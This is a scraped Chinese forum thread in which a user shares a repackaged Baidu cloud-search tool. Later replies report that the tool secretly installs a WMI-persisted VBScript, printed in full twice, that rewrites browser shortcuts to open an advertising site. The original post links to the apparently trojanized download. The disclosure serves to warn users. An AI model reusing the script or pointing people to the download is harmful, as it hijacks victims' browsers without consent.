fyFaZaBfPfK
gJBSgFJOXSN
VVTYq
gPLPvCxBbhQ
HzRYJ
GGNnPuM
nGthRxdMuksb
UwplLfuyqcBc
Win10论坛

Win10正式版系统下载主题平板

重定义Modern UI,打造完美Windows全新体验

Windows10下载|安装|新手宝典|必备软件

NGccO
pMoi
VQgEHrnfK
PCfz
rQnmRI
BcwoeK
YwPFXMbdyl
rAGrjuvASG
WITwP
LoNblasgu
gGwyt
wpTMvFMClaK
dHCloLN
XKhLkdHYM
owNSwfwUJPIq
WYKDLwDcKtvT
juULG
KhsIEq
RrznpKt
TfgnKVnEVi
XAzNPrxR
SpoC
wEPi
oSagsUv
gMAIxSEW
Qtia
yuEwZ
dbiN
ltli
BMWLD
hzehUyGS
fyTwt
iCHqpKmw
QOua
hHbsm
CyvSAE
sxPYDzcoxXgw
aXGgvsztr
mosMpONtv
TGqbr
RAnIfLvSW
LNFFvCVNUxi
sbWzjaMb
BSZnvzRBaec
yvCPYpMd
SRVGgkbsTiNu
UwElHFVC
nKdsDpIwWUa
DKyAfsvuFH
WXXAzqF
PjLccaC
ibilozegIvd
JAgsfokvHbdt
dwwWzhxbS
搜索
查看: 2654|回复: 14

[应用软件] 云搜网盘助手v1.7.16.0705单文件版 [复制链接]
跳转到指定楼层
复制 

Rank: 5Rank: 5Rank: 5

UID
1974337
帖子
500
PB币
690
贡献
0
技术
10
活跃
1735
楼主
发表于 2016-7-27 10:40:36 IP属地湖北 |只看该作者 |倒序浏览
快御云安全
本帖最后由 hongxj 于 2016-7-27 11:20 编辑

这是根据最新云搜网盘助手v1.7.16.0705重新打包制作而成的单文件版,免安装,双击直接启动,退出自动删除。

云搜网盘助手(百度网盘资源提过器)是一款绿色万能的百度网盘搜索工具。软件功能强大,支持搜索百度网盘的资源和新浪微盘,可以进行磁力连接搜索和百度云直链解析,还可以登陆自己的百度云网盘去重复资源。

【云搜网盘助手功能特点】

1、支持对百度云的搜索:
可以一键验证链接是否有效,这个版本开始支持分类搜索了
可以直接下载、保存到自己的百度云盘(需登录),同时也可以生成二维码,方便手机访问
2、支持新浪微盘搜索:
3、支持磁力搜索,这个版本开始支持生成种子文件
4、支持百度云盘、360云盘、可乐云和千军万马网盘的直链解析,同样可以生成二维码
5、支持百度网盘去重功能(新增):
索引成功后会按文件大小自动降序排列,本人亲测索引2W个文件耗时大概1分钟左右,所以速度还行。
同时支持对大文件的删除

云网盘搜索(2.25M)
http://pan.baidu.com/s/1i4UZ1el
https://yunpan.cn/c6V25mAAwuKjz (提取码:ebe1)

云网盘搜索(2.25M)




云搜网盘助手.PNG (100.32 KB, 下载次数: 1)

云搜网盘助手.PNG

Rank: 5Rank: 5Rank: 5

UID
62386
帖子
545
PB币
1158
贡献
0
技术
0
活跃
1585
沙发
发表于 2016-7-27 11:05:35 IP属地河北 |只看该作者
下载地址呢?

Rank: 2Rank: 2

UID
4633238
帖子
202
PB币
0
贡献
0
技术
0
活跃
469
板凳
发表于 2016-7-28 10:36:38 IP属地河南 |只看该作者
垃圾,会在ie的快捷方式里改主页

Rank: 2Rank: 2

UID
4633238
帖子
202
PB币
0
贡献
0
技术
0
活跃
469
4F
发表于 2016-7-31 18:01:02 IP属地河南 |只看该作者

帖子链接:http://www.chinapyg.com/thread-85057-1-1.html举报人:帖子楼主。举报内容:楼主所发软件暗藏脚本为浏览器快捷方式添加广告小尾巴。1.火眼查毒 安装文件 “云搜网盘助手V1.0.0_1.exe” :http://fireeye.ijinshan.com/analyse.html?md5=a577512c20c9b6723b023a11065d74b0&sha1=d7fbf627675a92d1b47e13d4a47a2670d03beb0e#key释放文件“SetHomePage.dll”:http://fireeye.ijinshan.com/analyse.html?md5=72f904ae3581cf599b38e8dbf0a13bb1&sha1=6492c0ef423cc0836a50694511006747193310df#full2.实测软件安装后,WMItool连接root\CIMV2 发现 _EventFilter.Name"VBScriptLive_filter", 查看ScriptTextScriptText 内容:On Error Resume Next:Const link = "http://hk.jtsh123.com/?r=y&m=1":Const link360 = "http://hk.jtsh123.com/?r=y&m=1&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:行为:查找浏览器为快捷方式添加小尾巴,因脚本并非即时运行,具有较强隐蔽性。望管理员明察。

Rank: 2Rank: 2

UID
4633238
帖子
202
PB币
0
贡献
0
技术
0
活跃
469
5F
发表于 2016-7-31 18:01:25 IP属地河南 |只看该作者

帖子链接:http://www.chinapyg.com/thread-85057-1-1.html举报人:帖子楼主。举报内容:楼主所发软件暗藏脚本为浏览器快捷方式添加广告小尾巴。1.火眼查毒 安装文件 “云搜网盘助手V1.0.0_1.exe” :http://fireeye.ijinshan.com/analyse.html?md5=a577512c20c9b6723b023a11065d74b0&sha1=d7fbf627675a92d1b47e13d4a47a2670d03beb0e#key释放文件“SetHomePage.dll”:http://fireeye.ijinshan.com/analyse.html?md5=72f904ae3581cf599b38e8dbf0a13bb1&sha1=6492c0ef423cc0836a50694511006747193310df#full2.实测软件安装后,WMItool连接root\CIMV2 发现 _EventFilter.Name"VBScriptLive_filter", 查看ScriptTextScriptText 内容:On Error Resume Next:Const link = "http://hk.jtsh123.com/?r=y&m=1":Const link360 = "http://hk.jtsh123.com/?r=y&m=1&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:行为:查找浏览器为快捷方式添加小尾巴,因脚本并非即时运行,具有较强隐蔽性。望管理员明察。

Rank: 2Rank: 2

UID
4633238
帖子
202
PB币
0
贡献
0
技术
0
活跃
469
6F
发表于 2016-7-31 18:04:43 IP属地河南 |只看该作者
再次曝光这个软件的恶意行为,这是在谷歌上搜到的同是曝光这个软件的帖子htt  p://w ww.chinapyg.com/thread-85342-1-1.html,这个是注册的恶意文件SetHomePage.dll,还有火眼的分析结果h ttp://fireeye.ijinshan.com/analyse.html?md5=a577512c20c9b6723b023a11065d74b0&sha1=d7fbf627675a92d1b47e13d4a47a2670d03beb0e#key以及h ttp://fireeye.ijinshan.com/analyse.html?md5=72f904ae3581cf599b38e8dbf0a13bb1&sha1=6492c0ef423cc0836a50694511006747193310df#full

Rank: 2Rank: 2

UID
2727565
帖子
136
PB币
99
贡献
0
技术
0
活跃
336
7F
发表于 2016-8-6 07:45:06 IP属地河北 |只看该作者
艹tm的  中招了!管理员来管管啊

Rank: 5Rank: 5Rank: 5

UID
1974337
帖子
500
PB币
690
贡献
0
技术
10
活跃
1735
8F
发表于 2016-8-6 11:05:12 IP属地湖北 |只看该作者
本帖最后由 hongxj 于 2016-8-6 11:27 编辑

暂时并没发现有什么不良现象出现,浏览器主页也没见到被修改。
这类软件是很容易被杀毒软件报有病毒的,但不一定真有病毒,不过小心为好,随时关注它是否真有恶意行为。
在线查毒结果:扫描结果:5%的杀软(2/39)报告发现病毒
http://r.virscan.org/report/6f5641310fe54340bdd6bec2ff1e3cac

Rank: 1

UID
2525230
帖子
22
PB币
38
贡献
0
技术
0
活跃
15
9F
发表于 2016-8-8 16:19:41 IP属地北京 |只看该作者
我也是看了楼猪发的绿色安全才下载用的,一用就中招了,而且这软件也不是楼猪说的那么好。我都不知道说什么好了。你知道吗:你坑的是爹。。。

Rank: 5Rank: 5Rank: 5

UID
730648
帖子
525
PB币
268
贡献
0
技术
0
活跃
563
10F
发表于 2016-8-18 08:35:20 IP属地福建 |只看该作者
曝光这个软件的恶意行为

Rank: 2Rank: 2

UID
4633238
帖子
202
PB币
0
贡献
0
技术
0
活跃
469
11F
发表于 2016-8-20 18:59:41 IP属地四川 |只看该作者
chonglouzisi 发表于 2016-8-6 07:45
艹tm的  中招了!管理员来管管啊

我的回复已经够详细了你们还下载

Rank: 2Rank: 2

UID
2727565
帖子
136
PB币
99
贡献
0
技术
0
活跃
336
12F
发表于 2016-8-22 08:04:34 IP属地河北 |只看该作者
东写西读3457 发表于 2016-8-20 18:59
我的回复已经够详细了你们还下载

关键是 没往下看 就下载了 中招后才回来看的。。。。。。。

Rank: 9

UID
615604
帖子
3955
PB币
3562
贡献
0
技术
0
活跃
1038
13F
发表于 2016-8-22 11:10:43 IP属地云南 |只看该作者
谢谢分享。

Rank: 5Rank: 5Rank: 5

UID
884132
帖子
735
PB币
1112
贡献
0
技术
0
活跃
799
14F
发表于 2016-8-26 11:30:33 IP属地湖北 |只看该作者
怎样解决问题呢?我也中招了

Rank: 5Rank: 5Rank: 5

UID
1974337
帖子
500
PB币
690
贡献
0
技术
10
活跃
1735
15F
发表于 2016-8-26 13:11:59 IP属地浙江 |只看该作者
本帖最后由 hongxj 于 2016-8-26 13:16 编辑
龚兵 发表于 2016-8-26 11:30
怎样解决问题呢?我也中招了

究竟中了什么招?请详细说明:修改主页了,系统无法启动了,IE无法浏览了,中毒了,音视频不正常了。。。。??
东写西读3457 提到的恶意行为:查找浏览器为快捷方式添加小尾巴   我至今没能明白什么意思。
回顶部
Copyright (C) 2005-2024 pcbeta.com, All rights reserved
Powered by Discuz!  苏ICP备17027154号  CDN加速及安全服务由「快御」提供
请勿发布违反中华人民共和国法律法规的言论,会员观点不代表远景论坛官方立场。
远景在线 | 远景论坛 | 苹果论坛 | Win11论坛 | Win10论坛 | Win8论坛 | Win7论坛 | WP论坛 | Office论坛